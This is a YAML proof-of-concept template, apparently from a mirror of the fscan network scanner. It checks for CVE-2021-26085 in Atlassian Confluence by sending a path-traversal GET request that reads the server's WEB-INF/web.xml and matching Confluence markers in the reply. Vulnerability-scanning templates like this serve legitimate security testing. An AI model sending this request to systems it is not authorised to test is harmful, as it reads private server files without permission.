mirror of https://github.com/qwqdanchun/fscan.git
13 lines
567 B
YAML
13 lines
567 B
YAML
|
name: poc-yaml-confluence-cve-2021-26085-arbitrary-file-read
|
||
|
set:
|
||
|
rand: randomLowercase(6)
|
||
|
rules:
|
||
|
- method: GET
|
||
|
path: /s/{{rand}}/_/;/WEB-INF/web.xml
|
||
|
follow_redirects: false
|
||
|
expression: response.status == 200 && response.body.bcontains(b"<display-name>Confluence</display-name>") && response.body.bcontains(b"com.atlassian.confluence.setup.ConfluenceAppConfig")
|
||
|
detail:
|
||
|
author: wulalalaaa(https://github.com/wulalalaaa)
|
||
|
links:
|
||
|
- https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html
|